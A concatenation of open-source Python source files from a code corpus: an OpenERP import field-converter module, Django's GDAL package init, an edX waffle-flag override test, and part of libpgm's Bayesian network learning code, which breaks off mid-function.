user-visible message for the error (it should be translatable and
translated). It can contain a ``field`` named format placeholder so the
caller can inject the field's translated, user-facing name (@string).
The second parameter is optional and, if provided, must be a mapping.
This mapping will be merged into the error dictionary returned to the
client.
If a converter can perform its function but has to make assumptions
about the data, it can send a warning to the user through adding an
instance of :class:`~.ImportWarning` to the second value
it returns. The handling of a warning at the upper levels is the same
as ``ValueError`` above.
:param column: column object to generate a value for
:type column: :class:`fields._column`
:param fromtype: type to convert to something fitting for ``column``
:type fromtype: type | str
:param context: openerp request context
:return: a function (fromtype -> column.write_type), if a converter is found
:rtype: Callable | None
"""
assert isinstance(fromtype, (type, str))
# FIXME: return None
typename = fromtype.__name__ if isinstance(fromtype, type) else fromtype
converter = getattr(
self, '_%s_to_%s' % (typename, column._type), None)
if not converter: return None
return functools.partial(
converter, cr, uid, model, column, context=context)
def _str_to_boolean(self, cr, uid, model, column, value, context=None):
# all translatables used for booleans
true, yes, false, no = _(u"true"), _(u"yes"), _(u"false"), _(u"no")
# potentially broken casefolding? What about locales?
trues = set(word.lower() for word in itertools.chain(
[u'1', u"true", u"yes"], # don't use potentially translated values
self._get_translations(cr, uid, ['code'], u"true", context=context),
self._get_translations(cr, uid, ['code'], u"yes", context=context),
))
if value.lower() in trues: return True, []
# potentially broken casefolding? What about locales?
falses = set(word.lower() for word in itertools.chain(
[u'', u"0", u"false", u"no"],
self._get_translations(cr, uid, ['code'], u"false", context=context),
self._get_translations(cr, uid, ['code'], u"no", context=context),
))
if value.lower() in falses: return False, []
return True, [ImportWarning(
_(u"Unknown value '%s' for boolean field '%%(field)s', assuming '%s'")
% (value, yes), {
'moreinfo': _(u"Use '1' for yes and '0' for no")
})]
def _str_to_integer(self, cr, uid, model, column, value, context=None):
try:
return int(value), []
except ValueError:
raise ValueError(
_(u"'%s' does not seem to be an integer for field '%%(field)s'")
% value)
def _str_to_float(self, cr, uid, model, column, value, context=None):
try:
return float(value), []
except ValueError:
raise ValueError(
_(u"'%s' does not seem to be a number for field '%%(field)s'")
% value)
def _str_id(self, cr, uid, model, column, value, context=None):
return value, []
_str_to_reference = _str_to_char = _str_to_text = _str_to_binary = _str_to_html = _str_id
def _str_to_date(self, cr, uid, model, column, value, context=None):
try:
time.strptime(value, DEFAULT_SERVER_DATE_FORMAT)
return value, []
except ValueError:
raise ValueError(
_(u"'%s' does not seem to be a valid date for field '%%(field)s'") % value, {
'moreinfo': _(u"Use the format '%s'") % u"2012-12-31"
})
def _input_tz(self, cr, uid, context):
# if there's a tz in context, try to use that
if context.get('tz'):
try:
return pytz.timezone(context['tz'])
except pytz.UnknownTimeZoneError:
pass
# if the current user has a tz set, try to use that
user = self.pool['res.users'].read(
cr, uid, [uid], ['tz'], context=context)[0]
if user['tz']:
try:
return pytz.timezone(user['tz'])
except pytz.UnknownTimeZoneError:
pass
# fallback if no tz in context or on user: UTC
return pytz.UTC
def _str_to_datetime(self, cr, uid, model, column, value, context=None):
if context is None: context = {}
try:
parsed_value = datetime.datetime.strptime(
value, DEFAULT_SERVER_DATETIME_FORMAT)
except ValueError:
raise ValueError(
_(u"'%s' does not seem to be a valid datetime for field '%%(field)s'") % value, {
'moreinfo': _(u"Use the format '%s'") % u"2012-12-31 23:59:59"
})
input_tz = self._input_tz(cr, uid, context)# Apply input tz to the parsed naive datetime
dt = input_tz.localize(parsed_value, is_dst=False)
# And convert to UTC before reformatting for writing
return dt.astimezone(pytz.UTC).strftime(DEFAULT_SERVER_DATETIME_FORMAT), []
def _get_translations(self, cr, uid, types, src, context):
types = tuple(types)
# Cache translations so they don't have to be reloaded from scratch on
# every row of the file
tnx_cache = cr.cache.setdefault(self._name, {})
if tnx_cache.setdefault(types, {}) and src in tnx_cache[types]:
return tnx_cache[types][src]
Translations = self.pool['ir.translation']
tnx_ids = Translations.search(
cr, uid, [('type', 'in', types), ('src', '=', src)], context=context)
tnx = Translations.read(cr, uid, tnx_ids, ['value'], context=context)
result = tnx_cache[types][src] = [t['value'] for t in tnx if t['value'] is not False]
return result
def _str_to_selection(self, cr, uid, model, column, value, context=None):
selection = column.selection
if not isinstance(selection, (tuple, list)):
# FIXME: Don't pass context to avoid translations?
# Or just copy context & remove lang?
selection = selection(model, cr, uid, context=None)
for item, label in selection:
label = ustr(label)
labels = self._get_translations(
cr, uid, ('selection', 'model', 'code'), label, context=context)
labels.append(label)
if value == unicode(item) or value in labels:
return item, []
raise ValueError(
_(u"Value '%s' not found in selection field '%%(field)s'") % (
value), {
'moreinfo': [_label or unicode(item) for item, _label in selection
if _label or item]
})
def db_id_for(self, cr, uid, model, column, subfield, value, context=None):
""" Finds a database id for the reference ``value`` in the referencing
subfield ``subfield`` of the provided column of the provided model.
:param model: model to which the column belongs
:param column: relational column for which references are provided
:param subfield: a relational subfield allowing building of refs to
existing records: ``None`` for a name_get/name_search,
``id`` for an external id and ``.id`` for a database
id
:param value: value of the reference to match to an actual record
:param context: OpenERP request context
:return: a pair of the matched database identifier (if any), the
translated user-readable name for the field and the list of
warnings
:rtype: (ID|None, unicode, list)
"""
if context is None: context = {}
id = None
warnings = []
action = {'type': 'ir.actions.act_window', 'target': 'new',
'view_mode': 'tree,form', 'view_type': 'form',
'views': [(False, 'tree'), (False, 'form')],
'help': _(u"See all possible values")}
if subfield is None:
action['res_model'] = column._obj
elif subfield in ('id', '.id'):
action['res_model'] = 'ir.model.data'
action['domain'] = [('model', '=', column._obj)]
RelatedModel = self.pool[column._obj]
if subfield == '.id':
field_type = _(u"database id")
try: tentative_id = int(value)
except ValueError: tentative_id = value
try:
if RelatedModel.search(cr, uid, [('id', '=', tentative_id)],
context=context):
id = tentative_id
except psycopg2.DataError:
# type error
raise ValueError(
_(u"Invalid database id '%s' for the field '%%(field)s'") % value,
{'moreinfo': action})
elif subfield == 'id':
field_type = _(u"external id")
if '.' in value:
module, xid = value.split('.', 1)
else:
module, xid = context.get('_import_current_module', ''), value
ModelData = self.pool['ir.model.data']
try:
_model, id = ModelData.get_object_reference(
cr, uid, module, xid)
except ValueError: pass # leave id is None
elif subfield is None:
field_type = _(u"name")
ids = RelatedModel.name_search(
cr, uid, name=value, operator='=', context=context)
if ids:
if len(ids) > 1:
warnings.append(ImportWarning(
_(u"Found multiple matches for field '%%(field)s' (%d matches)")
% (len(ids))))
id, _name = ids[0]
else:
raise Exception(_(u"Unknown sub-field '%s'") % subfield)
if id is None:
raise ValueError(
_(u"No matching record found for %(field_type)s '%(value)s' in field '%%(field)s'")
% {'field_type': field_type, 'value': value},
{'moreinfo': action})
return id, field_type, warnings
def _referencing_subfield(self, record):
""" Checks the record for the subfields allowing referencing (an
existing record in an other table), errors out if it finds potential
conflicts (multiple referencing subfields) or non-referencing subfields
returns the name of the correct subfield.
:param record:
:return: the record subfield to use for referencing and a list of warnings
:rtype: str, list
"""
# Can import by name_get, external id or database id
fieldset = set(record.iterkeys())
if fieldset - REFERENCING_FIELDS:
raise ValueError(
_(u"Can not create Many-To-One records indirectly, import the field separately"))
if len(fieldset) > 1:
raise ValueError(
_(u"Ambiguous specification for field '%(field)s', only provide one of name, external id or database id"))
# only one field left possible, unpack
[subfield] = fieldset
return subfield, []
def _str_to_many2one(self, cr, uid, model, column, values, context=None):
# Should only be one record, unpack
[record] = values
subfield, w1 = self._referencing_subfield(record)
reference = record[subfield]
id, subfield_type, w2 = self.db_id_for(
cr, uid, model, column, subfield, reference, context=context)
return id, w1 + w2
def _str_to_many2many(self, cr, uid, model, column, value, context=None):
[record] = value
subfield, warnings = self._referencing_subfield(record)
ids = []
for reference in record[subfield].split(','):
id, subfield_type, ws = self.db_id_for(
cr, uid, model, column, subfield, reference, context=context)
ids.append(id)
warnings.extend(ws)
return [REPLACE_WITH(ids)], warnings
def _str_to_one2many(self, cr, uid, model, column, records, context=None):
commands = []
warnings = []
if len(records) == 1 and exclude_ref_fields(records[0]) == {}:
# only one row with only ref field, field=ref1,ref2,ref3 as in
# m2o/m2m
record = records[0]
subfield, ws = self._referencing_subfield(record)
warnings.extend(ws)
# transform [{subfield:ref1,ref2,ref3}] into
# [{subfield:ref1},{subfield:ref2},{subfield:ref3}]
records = ({subfield:item} for item in record[subfield].split(','))
def log(_, e):
if not isinstance(e, Warning):
raise e
warnings.append(e)
for record in records:
id = None
refs = only_ref_fields(record)
# there are ref fields in the record
if refs:
subfield, w1 = self._referencing_subfield(refs)
warnings.extend(w1)
reference = record[subfield]
id, subfield_type, w2 = self.db_id_for(
cr, uid, model, column, subfield, reference, context=context)
warnings.extend(w2)
writable = column.converter(exclude_ref_fields(record), log)
if id:
commands.append(LINK_TO(id))
commands.append(UPDATE(id, writable))
else:
commands.append(CREATE(writable))
return commands, warnings
|
agpl-3.0
|
ashishnitinpatil/vnitstudnotifs
|
django/contrib/gis/gdal/__init__.py
|
115
|
2134
|
"""
This module houses ctypes interfaces for GDAL objects. The following GDAL
objects are supported:
CoordTransform: Used for coordinate transformations from one spatial
reference system to another.
Driver: Wraps an OGR data source driver.
DataSource: Wrapper for the OGR data source object, supports
OGR-supported data sources.
Envelope: A ctypes structure for bounding boxes (GDAL library
not required).
OGRGeometry: Object for accessing OGR Geometry functionality.
OGRGeomType: A class for representing the different OGR Geometry
types (GDAL library not required).
SpatialReference: Represents OSR Spatial Reference objects.
The GDAL library will be imported from the system path using the default
library name for the current OS. The default library path may be overridden
by setting `GDAL_LIBRARY_PATH` in your settings with the path to the GDAL C
library on your system.
GDAL links to a large number of external libraries that consume RAM when
loaded. Thus, it may desirable to disable GDAL on systems with limited
RAM resources -- this may be accomplished by setting `GDAL_LIBRARY_PATH`
to a non-existant file location (e.g., `GDAL_LIBRARY_PATH='/null/path'`;
setting to None/False/'' will not work as a string must be given).
"""
from django.contrib.gis.gdal.error import check_err, OGRException, OGRIndexError, SRSException
from django.contrib.gis.gdal.geomtype import OGRGeomType
# Attempting to import objects that depend on the GDAL library. The
# HAS_GDAL flag will be set to True if the library is present on
# the system.
try:
from django.contrib.gis.gdal.driver import Driver
from django.contrib.gis.gdal.datasource import DataSource
from django.contrib.gis.gdal.libgdal import gdal_version, gdal_full_version, GDAL_VERSION
from django.contrib.gis.gdal.srs import SpatialReference, CoordTransform
from django.contrib.gis.gdal.geometries import OGRGeometry
HAS_GDAL = True
except OGRException:
HAS_GDAL = False
try:
from django.contrib.gis.gdal.envelope import Envelope
except ImportError:
# No ctypes, but don't raise an exception.
pass
|
bsd-3-clause
|
philanthropy-u/edx-platform
|
openedx/core/djangoapps/waffle_utils/tests/test_models.py
|
4
|
1961
|
"""
Tests for waffle utils models.
"""
from ddt import data, ddt, unpack
from django.test import TestCase
from edx_django_utils.cache import RequestCache
from opaque_keys.edx.keys import CourseKey
from ..models import WaffleFlagCourseOverrideModel
@ddt
class WaffleFlagCourseOverrideTests(TestCase):
"""
Tests for the waffle flag course override model.
"""
WAFFLE_TEST_NAME = "waffle_test_course_override"
TEST_COURSE_KEY = CourseKey.from_string("edX/DemoX/Demo_Course")
OVERRIDE_CHOICES = WaffleFlagCourseOverrideModel.ALL_CHOICES
# Data format: ( is_enabled, override_choice, expected_result )
@data((True, OVERRIDE_CHOICES.on, OVERRIDE_CHOICES.on),
(True, OVERRIDE_CHOICES.off, OVERRIDE_CHOICES.off),
(False, OVERRIDE_CHOICES.on, OVERRIDE_CHOICES.unset))
@unpack
def test_setting_override(self, is_enabled, override_choice, expected_result):
RequestCache.clear_all_namespaces()
self.set_waffle_course_override(override_choice, is_enabled)
override_value = WaffleFlagCourseOverrideModel.override_value(
self.WAFFLE_TEST_NAME, self.TEST_COURSE_KEY
)
self.assertEqual(override_value, expected_result)
def test_setting_override_multiple_times(self):
RequestCache.clear_all_namespaces()
self.set_waffle_course_override(self.OVERRIDE_CHOICES.on)
self.set_waffle_course_override(self.OVERRIDE_CHOICES.off)
override_value = WaffleFlagCourseOverrideModel.override_value(
self.WAFFLE_TEST_NAME, self.TEST_COURSE_KEY
)
self.assertEqual(override_value, self.OVERRIDE_CHOICES.off)
def set_waffle_course_override(self, override_choice, is_enabled=True):
WaffleFlagCourseOverrideModel.objects.create(
waffle_flag=self.WAFFLE_TEST_NAME,
override_choice=override_choice,
enabled=is_enabled,
course_id=self.TEST_COURSE_KEY
)
|
agpl-3.0
|
Anaphory/libpgm
|
libpgm/pgmlearner.py
|
1
|
45576
|
# Copyright (c) 2012, CyberPoint International, LLC
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the CyberPoint International, LLC nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL CYBERPOINT INTERNATIONAL, LLC BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
This module provides tools to generate Bayesian networks that are "learned" from a data set. The learning process involves finding the Bayesian network that most accurately models data given as input -- in other words, finding the Bayesian network that makes the data set most likely. There are two major parts of Bayesian network learning: structure learning and parameter learning. Structure learning means finding the graph that most accurately depicts the dependencies detected in the data. Parameter learning means adjusting the parameters of the CPDs in a graph skeleton to most accurately model the data. This module has tools for both of these tasks.
'''
import copy
import itertools
try:
import numpy as np
except ImportError:
raise ImportError("numpy is not installed on your system.")
try:
from scipy.stats import chisquare
except ImportError:
raise ImportError("scipy is not installed on your system.")
from .nodedata import NodeData, StaticNodeData
from .graphskeleton import GraphSkeleton
from .discretebayesiannetwork import DiscreteBayesianNetwork
from .lgbayesiannetwork import LGBayesianNetwork
class PGMLearner():
'''
This class is a machine with tools for learning Bayesian networks from data. It contains the *discrete_mle_estimateparams*, *lg_mle_estimateparams*, *discrete_constraint_estimatestruct*, *lg_constraint_estimatestruct*, *discrete_condind*, *discrete_estimatebn*, and *lg_estimatebn* methods.
'''
def discrete_mle_estimateparams(self, graphskeleton, data):
'''
Estimate parameters for a discrete Bayesian network with a structure given by *graphskeleton* in order to maximize the probability of data given by *data*. This function takes the following arguments:
1. *graphskeleton* -- An instance of the :doc:`GraphSkeleton <graphskeleton>` class containing vertex and edge data.
2. *data* -- A list of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 'B',
'SAT': 'lowscore',
...
},
...
]
This function normalizes the distribution of a node's outcomes for each combination of its parents' outcomes. In doing so it creates an estimated tabular conditional probability distribution for each node. It then instantiates a :doc:`DiscreteBayesianNetwork <discretebayesiannetwork>` instance based on the *graphskeleton*, and modifies that instance's *Vdata* attribute to reflect the estimated CPDs. It then returns the instance.
The Vdata attribute instantiated is in the format seen in :doc:`unittestdict`, as described in :doc:`discretebayesiannetwork`.
Usage example: this would learn parameters from a set of 200 discrete samples::
import json
from libpgm.nodedata import NodeData
from libpgm.graphskeleton import GraphSkeleton
from libpgm.discretebayesiannetwork import DiscreteBayesianNetwork
from libpgm.pgmlearner import PGMLearner
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
bn = DiscreteBayesianNetwork(skel, nd)
data = bn.randomsample(200)
# instantiate my learner
learner = PGMLearner()
# estimate parameters from data and skeleton
result = learner.discrete_mle_estimateparams(skel, data)
# output
print json.dumps(result.Vdata, indent=2)
'''
assert (isinstance(graphskeleton, GraphSkeleton)), "First arg must be a loaded GraphSkeleton class."
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Second arg must be a list of dicts."
# instantiate Bayesian network, and add parent and children data
bn = StaticNodeData()
graphskeleton.toporder()
for vertex in graphskeleton.V:
bn.Vdata[vertex] = dict()
bn.Vdata[vertex]["children"] = graphskeleton.getchildren(vertex)
bn.Vdata[vertex]["parents"] = graphskeleton.getparents(vertex)
# make placeholders for vals, cprob, and numoutcomes
bn.Vdata[vertex]["vals"] = []
if (bn.Vdata[vertex]["parents"] == []):
bn.Vdata[vertex]["cprob"] = []
else:
bn.Vdata[vertex]["cprob"] = dict()
bn.Vdata[vertex]["numoutcomes"] = 0
bn = DiscreteBayesianNetwork(bn)
# determine which outcomes are possible for each node
for sample in data:
for vertex in bn.V:
if (sample[vertex] not in bn.Vdata[vertex]["vals"]):
bn.Vdata[vertex]["vals"].append(sample[vertex])
bn.Vdata[vertex]["numoutcomes"] += 1
# lay out probability tables, and put a [num, denom] entry in all spots:
# define helper function to recursively set up cprob table
def addlevel(vertex, _dict, key, depth, totaldepth):
if depth == totaldepth:
_dict[str(key)] = []
for _ in range(bn.Vdata[vertex]["numoutcomes"]):
_dict[str(key)].append([0, 0])
return
else:
for val in bn.Vdata[bn.Vdata[vertex]["parents"][depth]]["vals"]:
ckey = key[:]
ckey.append(str(val))
addlevel(vertex, _dict, ckey, depth+1, totaldepth)
# put [0, 0] at each entry of cprob table
for vertex in bn.V:
if (bn.Vdata[vertex]["parents"]):
root = bn.Vdata[vertex]["cprob"]
numparents = len(bn.Vdata[vertex]["parents"])
addlevel(vertex, root, [], 0, numparents)
else:
for _ in range(bn.Vdata[vertex]["numoutcomes"]):
bn.Vdata[vertex]["cprob"].append([0, 0])
# fill out entries with samples:
for sample in data:
for vertex in bn.V:
# compute index of result
rindex = bn.Vdata[vertex]["vals"].index(sample[vertex])
# go to correct place in Vdata
if bn.Vdata[vertex]["parents"]:
pvals = [str(sample[t]) for t in bn.Vdata[vertex]["parents"]]
lev = bn.Vdata[vertex]["cprob"][str(pvals)]
else:
lev = bn.Vdata[vertex]["cprob"]
# increase all denominators for the current condition
for entry in lev:
entry[1] += 1
# increase numerator for current outcome
lev[rindex][0] += 1
# convert arrays to floats
for vertex in bn.V:
if not bn.Vdata[vertex]["parents"]:
bn.Vdata[vertex]["cprob"] = [x[0]/float(x[1]) for x in bn.Vdata[vertex]["cprob"]]
else:
for key in bn.Vdata[vertex]["cprob"].keys():
try:
bn.Vdata[vertex]["cprob"][key] = [x[0]/float(x[1]) for x in bn.Vdata[vertex]["cprob"][key]]
# default to even distribution if no data points
except ZeroDivisionError:
bn.Vdata[vertex]["cprob"][key] = [1/float(bn.Vdata[vertex]["numoutcomes"]) for x in bn.Vdata[vertex]["cprob"][key]]
# return cprob table with estimated probability distributions
return bn
def lg_mle_estimateparams(self, graphskeleton, data):
'''
Estimate parameters for a linear Gaussian Bayesian network with a structure given by *graphskeleton* in order to maximize the probability of data given by *data*. This function takes the following arguments:
1. *graphskeleton* -- An instance of the :doc:`GraphSkeleton <graphskeleton>` class containing vertex and edge data.
2. *data* -- A list of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 74.343,
'Intelligence': 29.545,
...
},
...
]
The algorithm used to calculate the linear Gaussian parameters is beyond the scope of this documentation -- for a full explanation, cf. Koller et al. 729. After the parameters are calculated, the program instantiates a :doc:`DiscreteBayesianNetwork <discretebayesiannetwork>` instance based on the *graphskeleton*, and modifies that instance's *Vdata* attribute to reflect the estimated CPDs. It then returns the instance.
The Vdata attribute instantiated is in the format seen in the input file example :doc:`unittestdict`, as described in :doc:`discretebayesiannetwork`.
Usage example: this would learn parameters from a set of 200 linear Gaussian samples::
import json
from libpgm.nodedata import NodeData
from libpgm.graphskeleton import GraphSkeleton
from libpgm.lgbayesiannetwork import LGBayesianNetwork
from libpgm.pgmlearner import PGMLearner
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestlgdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
lgbn = LGBayesianNetwork(skel, nd)
data = lgbn.randomsample(200)
# instantiate my learner
learner = PGMLearner()
# estimate parameters
result = learner.lg_mle_estimateparams(skel, data)
# output
print json.dumps(result.Vdata, indent=2)
'''
assert (isinstance(graphskeleton, GraphSkeleton)), "First arg must be a loaded GraphSkeleton class."
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Second arg must be a list of dicts."
# instantiate Bayesian network, and add parent and children data
bn = StaticNodeData()
graphskeleton.toporder()
for vertex in graphskeleton.V:
bn.Vdata[vertex] = dict()
bn.Vdata[vertex]["children"] = graphskeleton.getchildren(vertex)
bn.Vdata[vertex]["parents"] = graphskeleton.getparents(vertex)
# make placeholders for mean_base, mean_scal, and variance
bn.Vdata[vertex]["mean_base"] = 0.0
bn.Vdata[vertex]["mean_scal"] = []
for parent in bn.Vdata[vertex]["parents"]:
bn.Vdata[vertex]["mean_scal"].append(0.0)
bn.Vdata[vertex]["variance"] = 0.0
bn = LGBayesianNetwork(bn)
# make covariance table, array of E[X_i] for each vertex, and table
# of E[X_i * X_j] for each combination of vertices
cov = [[0 for _ in range(len(bn.V))] for __ in range(len(bn.V))]
singletons = [0 for _ in range(len(bn.V))]
numtrials = len(data)
for sample in data:
for x in range(len(bn.V)):
singletons[x] += sample[bn.V[x]]
for y in range(len(bn.V)):
cov[x][y] += sample[bn.V[x]] * sample[bn.V[y]]
for x in range(len(bn.V)):
singletons[x] /= float(numtrials)
for y in range(len(bn.V)):
cov[x][y] /= float(numtrials)
# (save copy. this is the E[X_i * X_j] table)
product_expectations = [[cov[x][y] for y in range(len(bn.V))] for x in range(len(bn.V))]
for x in range(len(bn.V)):
for y in range(len(bn.V)):
cov[x][y] = cov[x][y] - (singletons[x] * singletons[y])
# construct system of equations and solve (for each node)
for x in range(len(bn.V)):
# start with the E[X_i * X_j] table
system = [[product_expectations[p][q] for q in range(len(bn.V))] for p in range(len(bn.V))]
# step 0: remove all entries from all the tables except for node and its parents
rowstokeep = [x]
for z in range(len(bn.V)):
if bn.V[z] in bn.Vdata[bn.V[x]]["parents"]:
rowstokeep.append(z)
smalldim = len(rowstokeep)
smallsystem = [[0 for _ in range(smalldim)] for __ in range(smalldim)]
smallcov = [[0 for _ in range(smalldim)] for __ in range(smalldim)]
smallsing = [0 for _ in range(smalldim)]
for index in range(len(rowstokeep)):
smallsing[index] = singletons[rowstokeep[index]]
for index2 in range(len(rowstokeep)):
smallsystem[index][index2] = system[rowstokeep[index]][rowstokeep[index2]]
smallcov[index][index2] = cov[rowstokeep[index]][rowstokeep[index2]]
# step 1: delete and copy row corresponding to node (using [row][column] notation)
tmparray = [0 for _ in range(smalldim)]
for y in range(smalldim):
if (y > 0):
for j in range(smalldim):
smallsystem[y-1][j] = smallsystem[y][j]
if (y == 0):
for j in range(smalldim):
tmparray[j] = smallsystem[y][j]
# step 2: delete column, leaving system with all entries
# corresponding to parents of node
for y in range(smalldim):
if (y > 0):
for j in range(smalldim):
smallsystem[j][y-1] = smallsystem[j][y]
# step 3: take entry for node out of singleton array and store it
bordarray = []
for y in range(smalldim):
if (y != 0):
bordarray.append(smallsing[y])
else:
tmpentry = smallsing[y]
# step 4: add border array on borders of system
for y in range(len(bordarray)):
smallsystem[smalldim - 1][y] = bordarray[y]
smallsystem[y][smalldim - 1] = bordarray[y]
smallsystem[smalldim - 1][smalldim - 1] = 1
# step 5: construct equality vector (the 'b' of ax = b)
evector = [0 for _ in range(smalldim)]
for y in range(smalldim):
if (y != smalldim - 1):
evector[y] = tmparray[y + 1]
else:
evector[y] = tmpentry
# use numpy to solve
a = np.array(smallsystem)
b = np.array(evector)
solve = list(np.linalg.solve(a, b))
# fill mean_base and mean_scal[] with this data
bn.Vdata[bn.V[x]]["mean_base"] = solve[smalldim - 1]
for i in range(smalldim - 1):
bn.Vdata[bn.V[x]]["mean_scal"][i] = solve[i]
# add variance
variance = smallcov[0][0]
for y in range(1, smalldim):
for z in range(1, smalldim):
variance -= (bn.Vdata[bn.V[x]]["mean_scal"][y-1] * bn.Vdata[bn.V[x]]["mean_scal"][z-1] * smallcov[y][z])
bn.Vdata[bn.V[x]]["variance"] = variance
# that's all folks
return bn
def discrete_constraint_estimatestruct(self, data, pvalparam=0.05, indegree=1):
'''
Learn a Bayesian network structure from discrete data given by *data*, using constraint-based approaches. This function first calculates all the independencies and conditional independencies present between variables in the data. To calculate dependencies, it uses the *discrete_condind* method on each pair of variables, conditioned on other sets of variables of size *indegree* or smaller, to generate a chi-squared result and a p-value. If this p-value is less than *pvalparam*, the pair of variables are considered dependent conditioned on the variable set. Once all true dependencies -- pairs of variables that are dependent no matter what they are conditioned by -- are found, the algorithm uses these dependencies to construct a directed acyclic graph. It returns this DAG in the form of a :doc:`GraphSkeleton <graphskeleton>` class.
Arguments:
1. *data* -- An array of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 'B',
'SAT': 'lowscore',
...
},
...
]
2. *pvalparam* -- (Optional, default is 0.05) The p-value below which to consider something significantly unlikely. A common number used is 0.05. This is passed to *discrete_condind* when it is called.
3. *indegree* -- (Optional, default is 1) The upper bound on the size of a witness set (see Koller et al. 85). If this is larger than 1, a huge amount of samples in *data* are required to avoid a divide-by-zero error.
Usage example: this would learn structure from a set of 8000 discrete samples::
import json
from libpgm.nodedata import NodeData
from libpgm.graphskeleton import GraphSkeleton
from libpgm.discretebayesiannetwork import DiscreteBayesianNetwork
from libpgm.pgmlearner import PGMLearner
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
bn = DiscreteBayesianNetwork(skel, nd)
data = bn.randomsample(8000)
# instantiate my learner
learner = PGMLearner()
# estimate structure
result = learner.discrete_constraint_estimatestruct(data)
# output
print json.dumps(result.E, indent=2)
'''
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Arg must be a list of dicts."
# instantiate array of variables and array of potential dependencies
variables = list(data[0].keys())
ovariables = variables[:]
dependencies = []
for x in variables:
ovariables.remove(x)
for y in ovariables:
if (x != y):
dependencies.append([x, y])
# define helper function to find subsets
def subsets(array):
result = []
for i in range(indegree + 1):
comb = itertools.combinations(array, i)
for c in comb:
result.append(list(c))
return result
witnesses = []
othervariables = variables[:]
# for each pair of variables X, Y:
for X in variables:
othervariables.remove(X)
for Y in othervariables:
# consider all sets of witnesses that do not have X or Y in
# them, and are less than or equal to the size specified by
# the "indegree" argument
for U in subsets(variables):
if (X not in U) and (Y not in U) and len(U) <= indegree:
# determine conditional independence
chi, pv, witness = self.discrete_condind(data, X, Y, U)
if pv > pvalparam:
msg = "***%s and %s are found independent (chi = %f, pv = %f) with witness %s***" % (X, Y, chi, pv, U)
try:
dependencies.remove([X, Y])
dependencies.remove([Y, X])
except:
pass
witnesses.append([X, Y, witness])
break
# now that we have found our dependencies, run build PDAG (cf. Koller p. 89)
# with the stored set of independencies:
# assemble undirected graph skeleton
pdag = GraphSkeleton()
pdag.E = dependencies
pdag.V = variables
# adjust for immoralities (cf. Koller 86)
dedges = [x[:] for x in pdag.E]
for edge in dedges:
edge.append('u')
# define helper method "exists_undirected_edge"
def exists_undirected_edge(one_end, the_other_end):
for edge in dedges:
if len(edge) == 3:
if (edge[0] == one_end and edge[1] == the_other_end):
return True
elif (edge[1] == one_end and edge[0] == the_other_end):
return True
return False
# define helper method "exists_edge"
def exists_edge(one_end, the_other_end):
if exists_undirected_edge(one_end, the_other_end):
return True
elif [one_end, the_other_end] in dedges:
return True
elif [the_other_end, one_end] in dedges:
return True
return False
for edge1 in reversed(dedges):
for edge2 in reversed(dedges):
if (edge1 in dedges) and (edge2 in dedges):
if edge1[0] == edge2[1] and not exists_edge(edge1[1], edge2[0]):
if (([edge1[1], edge2[0], [edge1[0]]] not in witnesses) and ([edge2[0], edge1[1], [edge1[0]]] not in witnesses)):
dedges.append([edge1[1], edge1[0]])
dedges.append([edge2[0], edge2[1]])
dedges.remove(edge1)
dedges.remove(edge2)
elif edge1[1] == edge2[0] and not exists_edge(edge1[0], edge2[1]):
if (([edge1[0], edge2[1], [edge1[1]]] not in witnesses) and ([edge2[1], edge1[0], [edge1[1]]] not in witnesses)):
dedges.append([edge1[0], edge1[1]])
dedges.append([edge2[1], edge2[0]])
dedges.remove(edge1)
dedges.remove(edge2)
elif edge1[1] == edge2[1] and edge1[0] != edge2[0] and not exists_edge(edge1[0], edge2[0]):
if (([edge1[0], edge2[0], [edge1[1]]] not in witnesses) and ([edge2[0], edge1[0], [edge1[1]]] not in witnesses)):
dedges.append([edge1[0], edge1[1]])
dedges.append([edge2[0], edge2[1]])
dedges.remove(edge1)
dedges.remove(edge2)
elif edge1[0] == edge2[0] and edge1[1] != edge2[1] and not exists_edge(edge1[1], edge2[1]):
if (([edge1[1], edge2[1], [edge1[0]]] not in witnesses) and ([edge2[1], edge1[1], [edge1[0]]] not in witnesses)):
dedges.append([edge1[1], edge1[0]])
dedges.append([edge2[1], edge2[0]])
dedges.remove(edge1)
dedges.remove(edge2)
# use right hand rules to improve graph until convergence (Koller 89)
olddedges = []
while (olddedges != dedges):
olddedges = [x[:] for x in dedges]
for edge1 in reversed(dedges):
for edge2 in reversed(dedges):
# rule 1
inverted = False
check1, check2 = False, True
